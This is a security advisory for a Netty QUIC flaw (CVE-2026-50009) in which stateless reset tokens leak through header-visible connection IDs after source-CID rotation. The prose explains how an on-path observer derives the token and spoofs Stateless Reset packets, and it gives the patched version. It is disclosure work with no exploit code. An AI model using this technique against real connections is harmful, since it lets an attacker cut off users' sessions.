CVE-2026-50009: Netty QUIC stateless reset token material exposed through header-visible connection IDs
Summary Netty QUIC exposes the stateless reset token on the network path when using the default HMAC-based connection-ID and stateless-reset-token generators. The reset token for the server's current source connection ID can be derived from bytes that appear as the connection ID in QUIC headers after a source-CID rotation. An on-path attacker observing the headers can use the token to perform a Denial of Service by sending a spoofed Stateless Reset packet.
Details The sign-based connection ID generator (HmacSignQuicConnectionIdGenerator) and reset token generator (HmacSignQuicResetTokenGenerator) both evaluate HMAC-SHA256 with the same JVM-wide static key (io.netty.handler.codec.quic.Hmac).
During source CID rotation (QuicheQuicChannel.newSourceConnectionIds), the current server source CID C is used as input to produce the next CID N. The stateless reset token for C is defined over HMAC(K, C), specifically the first 16 bytes. The next CID N is the first L bytes of the same digest, where L = |C|.
Whenever L ≥ 16, the first 16 bytes of N are exactly the stateless reset token for C. Because N is carried in QUIC headers as a connection ID, an observer can read the headers and learn the reset token without decrypting the payload.
This directly violates RFC 9000 https://datatracker.ietf.org/doc/html/rfc9000#name-calculating-a-stateless-res: The stateless reset token MUST be difficult to guess. Additionally https://datatracker.ietf.org/doc/html/rfc9000#name-stateless-reset-oracle
Impact Information Disclosure and Denial of Service. An on-path attacker can obtain the stateless reset token from the connection ID header and attempt to abruptly close the client side of the connection by sending a spoofed Stateless Reset datagram.
Other sources
Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, Netty QUIC exposes the stateless reset token on the network path when using the default HMAC-based connection-ID and stateless-reset-token generators. The reset token for the server's current source connection ID can be derived from bytes that appear as the connection ID in QUIC headers after a source-CID rotation. An on-path attacker observing the headers can use the token to perform a Denial of Service by sending a spoofed Stateless Reset packet. Version 4.2.15.Final patches the issue.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-50009?
CVE-2026-50009 has a severity rating of medium with a score of 4.8.
What vulnerability does CVE-2026-50009 represent?
CVE-2026-50009 represents an information leak vulnerability in Netty QUIC that exposes the stateless reset token.
How do I fix CVE-2026-50009?
To fix CVE-2026-50009, upgrade to Netty version 4.2.15.Final or later.
What types of applications are affected by CVE-2026-50009?
CVE-2026-50009 affects applications using Netty QUIC prior to version 4.2.15.Final.
What can an attacker do with CVE-2026-50009?
An attacker can exploit CVE-2026-50009 to gain access to the stateless reset token, potentially compromising the security of network communications.